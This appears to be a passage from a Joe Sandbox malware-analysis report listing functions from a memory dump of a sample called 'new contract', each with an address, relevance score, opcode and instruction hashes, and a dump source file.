                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: be38975e91db932a6e57a268de6d52efd2513a70bd7a18a686aaa14ab59dbd1c
                                                                                                                                                                            • Instruction ID: 41de8e92c7b53b76a13f5e726961d27be0ab9567a3bb5787352c5a38e970e319
                                                                                                                                                                            • Opcode Fuzzy Hash: be38975e91db932a6e57a268de6d52efd2513a70bd7a18a686aaa14ab59dbd1c
                                                                                                                                                                            • Instruction Fuzzy Hash: 23D1E271E0060A8BDF15CF69CC81AFEB7FEAF88304F18816AD955A7241D735E946CB60
                                                                                                                                                                            Function 016265D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c6a2e42a72aef59e7dc7be7d1e14dd29d011ab7b164e1e409c28b5cfe8ffd777
                                                                                                                                                                            • Instruction ID: 949a4827902bf7243a089df4156e1d9eeb80f49ff3974d5fb502476401ef8365
                                                                                                                                                                            • Opcode Fuzzy Hash: c6a2e42a72aef59e7dc7be7d1e14dd29d011ab7b164e1e409c28b5cfe8ffd777
                                                                                                                                                                            • Instruction Fuzzy Hash: 64E1AE71608752CFC715CF28C890A6ABBE1FF89314F058A6DE99987351DB31E906CF92
                                                                                                                                                                            Function 01618397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d385bca1dd8cee3a4c591bab7e2a8ec4d4cebbf84df0b32b1285537da716c6ee
                                                                                                                                                                            • Instruction ID: 8ac2d6902ab0e4b99afc7170718bdb887c37aeba6715dc57a3dc96e4ac37ff33
                                                                                                                                                                            • Opcode Fuzzy Hash: d385bca1dd8cee3a4c591bab7e2a8ec4d4cebbf84df0b32b1285537da716c6ee
                                                                                                                                                                            • Instruction Fuzzy Hash: 87D10371A006169BDB14CF68CC90EBEB7BAFF54314F09462DEA16DB284EB34E951CB50
                                                                                                                                                                            Function 016A8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                            • Instruction ID: 74e5f5b10202c01bb28de6f3902da432b14ceeea6990281fd027e2219fe190e2
                                                                                                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                            • Instruction Fuzzy Hash: B8B17174A006059FEB24DB99CD40AABBBBEFF84305F90846DAA4297790DB34ED45CF50
                                                                                                                                                                            Function 01630535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                            • Instruction ID: 79cc52e7418bca73922415beb8a20d5cbe626597a79e8778d76640210282b82c
                                                                                                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                            • Instruction Fuzzy Hash: 7BB10671604646AFDB26DB68CD50BBEBBF6AFC8310F140299E552D7381DB30E946CB90
                                                                                                                                                                            Function 016283C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d981faba4b0adfbc09a0f927a7bb069352ba4859d54b10d005f721991b1db786
                                                                                                                                                                            • Instruction ID: 2c9d0751dcbebfbdf1698a6989ed02ec414120ad954f99adf177eb0ed5bb706b
                                                                                                                                                                            • Opcode Fuzzy Hash: d981faba4b0adfbc09a0f927a7bb069352ba4859d54b10d005f721991b1db786
                                                                                                                                                                            • Instruction Fuzzy Hash: C6C156702083418FE764DF18C894BAAB7E9BF88304F44496DE98997391D7B4E909CF92
                                                                                                                                                                            Function 0161C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 52b445a8986c62285e94a659874b552802653b7fe699586cc9b4a18fc70f3297
                                                                                                                                                                            • Instruction ID: 41041f693ada8f7b7c3220abe833344283f7ac8e5340a23f08dcae7b972448bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 52b445a8986c62285e94a659874b552802653b7fe699586cc9b4a18fc70f3297
                                                                                                                                                                            • Instruction Fuzzy Hash: 67B18270A402668BDB64DF58CC90BADB7B6EF44700F0885E9D50AE7385EB30DD86CB24
                                                                                                                                                                            Function 0164E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b43d71b040088946ef3a98ede1e414e3e4183981b1c9661edf4d0b848281253b
                                                                                                                                                                            • Instruction ID: 3527e5b777ae00019dc329ba41c29a52499991282711a8597c1887601c7144f9
                                                                                                                                                                            • Opcode Fuzzy Hash: b43d71b040088946ef3a98ede1e414e3e4183981b1c9661edf4d0b848281253b
                                                                                                                                                                            • Instruction Fuzzy Hash: 46A11631E006259FEB21EB5CCC48BAEBBB5BF01724F054295EA00AB391D7789D41CBD1
                                                                                                                                                                            Function 01660185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2628868fae2405f36530e2200a6479bf5c245dfa41f9596bc09cec8cfafa18e6
                                                                                                                                                                            • Instruction ID: 3ae864747dc35d5eb5d32098abe2c25de7b8d1120191a6674cb34fffe4964801
                                                                                                                                                                            • Opcode Fuzzy Hash: 2628868fae2405f36530e2200a6479bf5c245dfa41f9596bc09cec8cfafa18e6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6BA18F71A01616DBEB25DF69CD90BAAB7A9FF54314F04403DEA4597381EB34E812CB90
                                                                                                                                                                            Function 016F4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 62a9601b875959a5649f7509493015e7e36ebcaaae727c9843297f95c2ef848c
                                                                                                                                                                            • Instruction ID: 10e7e14395306f0328872087e7d19858c1dcfa4ee0fc004b53fe51c8820764c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 62a9601b875959a5649f7509493015e7e36ebcaaae727c9843297f95c2ef848c
                                                                                                                                                                            • Instruction Fuzzy Hash: 96A1CD72A056129FC721DF18CD80B6ABBEAFF88714F05492CF6859BB51CB34E901CB95
                                                                                                                                                                            Function 016F2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                            • Instruction ID: c876e3de4e49ff765372efbc5095f6f6456314a0517019185ce6f3f8b2ec08a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                            • Instruction Fuzzy Hash: D4B11571E0061A9FDB29CFA9C890AADBBB5FF88310F14816DEA15A7354D730E941CF94
                                                                                                                                                                            Function 016A60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                                                                                                                                            • Instruction ID: 9c548cd10b645f9bec6e11f92875b960c25f9eaff6a5db3462edd7a9bbca3def
                                                                                                                                                                            • Opcode Fuzzy Hash: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                                                                                                                                            • Instruction Fuzzy Hash: A091A171D00216AFDB15CFA8DC94BAEBFB5AF48710F5941A9E610AB341D734ED018FA4
                                                                                                                                                                            Function 0163E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 872d24a9fc816459b3ccbf51f4dbebe2a9b718e4e6a250f5ac9772aa3b7dc9fa
                                                                                                                                                                            • Instruction ID: 616beb3dbc6778b664b4d8b38242cf337d1281f3b313dec9d68e507b25581d2e
                                                                                                                                                                            • Opcode Fuzzy Hash: 872d24a9fc816459b3ccbf51f4dbebe2a9b718e4e6a250f5ac9772aa3b7dc9fa
                                                                                                                                                                            • Instruction Fuzzy Hash: BD914571A01216DBEB24EB5CCC40B79BBB2EFD8724F058569ED059B381E736D902CB61
                                                                                                                                                                            Function 01676ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                                                                                                                                            • Instruction ID: 022202346f8f469fad5aa596878c09f9beb1fb8e57cde962f2da63f470dddaaa
                                                                                                                                                                            • Opcode Fuzzy Hash: 21c3aaef74c5232278a3728bb2dd48cb6c4b8f2a278cf028b96d13097a833f14
                                                                                                                                                                            • Instruction Fuzzy Hash: B88182B1A00A169FEB24CF69C940ABEBBF9FB48700F14852EE455E7740E734D951CBA4
                                                                                                                                                                            Function 016EAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                            • Instruction ID: 41f1f04cbb39e53541e452bd5c31426a8e9b7179fed7d8486ac8feabf07ef05e
                                                                                                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                            • Instruction Fuzzy Hash: ED819172A012059FDF19CF98C898AAEBBF6BF84310F18866DD9169B344D774D911CB44
                                                                                                                                                                            Function 0165E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                                                                                                                                            • Instruction ID: 13c46929b403e44de5d29583776f161ec8fc72c7ed9f5e64699d7dfacb5cf2be
                                                                                                                                                                            • Opcode Fuzzy Hash: 122db80ae53c561bbe5112dc9e856cad211a39ce0dfe096bddbb806abf45dfdf
                                                                                                                                                                            • Instruction Fuzzy Hash: BB817C71A00609AFDF65CFA9CC80AEEFBBAFB88354F10442DE955A7211D731AD05CB60
                                                                                                                                                                            Function 0163C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d6d68a04610a30a296caae1acb9f71b294c9571016894663e1ec4f601214cdcf
                                                                                                                                                                            • Instruction ID: 2cc57f6de0ec2f2537262dc7aada4be63025e71d43f855e6d777411e478de2de
                                                                                                                                                                            • Opcode Fuzzy Hash: d6d68a04610a30a296caae1acb9f71b294c9571016894663e1ec4f601214cdcf
                                                                                                                                                                            • Instruction Fuzzy Hash: 2471CE75D04669DBCB26DF58CC90BBEBBB5FF98710F14821AE942AB350D7709801CBA0
                                                                                                                                                                            Function 016D47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                                                                                                                                            • Instruction ID: ae05f736f7307935b4b0ec1b72852f0912a00951d49ce346b874a7bf10c98ee9
                                                                                                                                                                            • Opcode Fuzzy Hash: 63570eaf87053ff5610b5b079cc706a99ae200feb29fdd78967d763c95e4ba03
                                                                                                                                                                            • Instruction Fuzzy Hash: A9719F70D01205EFDB20CF5DDD45AAABBF9EB91710B05815EFA00AB658CB71DD80CB59
                                                                                                                                                                            Function 0163260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                                                                                                                                            • Instruction ID: 7d398a5e2002eba43e0ade38e5e4082f78e672cbccf8922da7f179543aede33b
                                                                                                                                                                            • Opcode Fuzzy Hash: 7004aa116b2bc2dc45250a15f36ea5bfe7665cefdac0af507811211e95a72139
                                                                                                                                                                            • Instruction Fuzzy Hash: CD71CF31A046528FD312DF2CC890B2AB7E6FFC5710F0885ADE8958B352DB34D846CB95
                                                                                                                                                                            Function 016A035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                            • Instruction ID: e403c160b5ae3c305ef3440644f79790940e673171110a7a32f361d189b7b095
                                                                                                                                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                            • Instruction Fuzzy Hash: F0715C71A0061AAFDB10DFA9CD84A9EBBBAFF88700F504569E545E7250DB34EE01CF94
                                                                                                                                                                            Function 016B62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                                                                                                                                            • Instruction ID: 7d2759da3e417d8551ac45db08c5e6e0f6216bb58469353723f31d81106d6544
                                                                                                                                                                            • Opcode Fuzzy Hash: e5581b752c62875234e3d1519cb6840a6493d106f2f9ac486912ad5da966dae4
                                                                                                                                                                            • Instruction Fuzzy Hash: EF71E332241B01AFE732DF18CC94F96BBB6EF40724F14842CE656872A1D779E984CB50
                                                                                                                                                                            Function 01628AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                                                                                                                                            • Instruction ID: 0a90b5bd036825e13e66a9285cb6e2fa60ddc04ab32f1ee850d1e03972b69808
                                                                                                                                                                            • Opcode Fuzzy Hash: a8751ac47de7da0414d9888351a151bc88e40223ec6b263ce58dd71c16a862f7
                                                                                                                                                                            • Instruction Fuzzy Hash: A8818C72A043168BDB24DF9CDDA4B6DB7FABB48320F19822DD901AB381C7749941CB94
                                                                                                                                                                            Function 016F8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                                                                                                                                            • Instruction ID: d1462d05d27c0d1d0e35a4a7e85ad7c06b23709f7834d01f782c09be16a939ec
                                                                                                                                                                            • Opcode Fuzzy Hash: f765375da1e71ca55ec22ed6b5f49cba3462187fc586b62d4b0eaf39f2c6945b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D71F572E0021AABDF16DB94CC81FAEBBB9FB04354F10416DE621A7290D774AA45CB94
                                                                                                                                                                            Function 016DA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                                                                                                                                            • Instruction ID: 03b88e38e32c9e88c0b6a7c6908814ce8b4e522a4323962b4b44d0469ccff163
                                                                                                                                                                            • Opcode Fuzzy Hash: fe6320159ca80fd8bc485de6d71253932a883a7b624e68ae2ad1256ff1b9b165
                                                                                                                                                                            • Instruction Fuzzy Hash: 7551CF72909612AFD721DEA8CC44E6BBBE9EBC9750F01092DFA40DB250D774ED05C7A2
                                                                                                                                                                            Function 016C8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                                                                                                                                            • Instruction ID: e068137f2802661ce8219c44c428f8a8c999cc0a4d96abeb1a27d9f528546a23
                                                                                                                                                                            • Opcode Fuzzy Hash: 524006e6b39ad7083f8f1a2ba966a3909e00f4ce9678b9b593f1111ff41b6406
                                                                                                                                                                            • Instruction Fuzzy Hash: F9518A709007059BD731DF9AC884AABFBFDFF94B10F10861ED296976A1C7B0A945CB90
                                                                                                                                                                            Function 0165E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                                                                                                                                            • Instruction ID: 21eb06d41f731e57e34b7f86a29dfe2ff2a3019dce811ef52760985fd1c1687d
                                                                                                                                                                            • Opcode Fuzzy Hash: cd8195e1256435247d2f0a5170072678abe13ccf12752bde6baef1a95e70dcec
                                                                                                                                                                            • Instruction Fuzzy Hash: 71514971200A059FCB22EFA9CD80EAAB7BEFF54794F40046DE94297360D735EA41CB54
                                                                                                                                                                            Function 016C4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                                                                                                                                            • Instruction ID: f32179fed5c886bff7b1a79377244a582af60b76067951201541e6172ce72e21
                                                                                                                                                                            • Opcode Fuzzy Hash: 2760353adb8f8ac4d9d6209577decbe20cd55f5e6dfeb9532ca289429992ba62
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D5145716083028FD754DF2AC891A6BBBE6FFC8A14F44492DF589C7350EB34D9068B96
                                                                                                                                                                            Function 016445B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                            Download Yara Rule
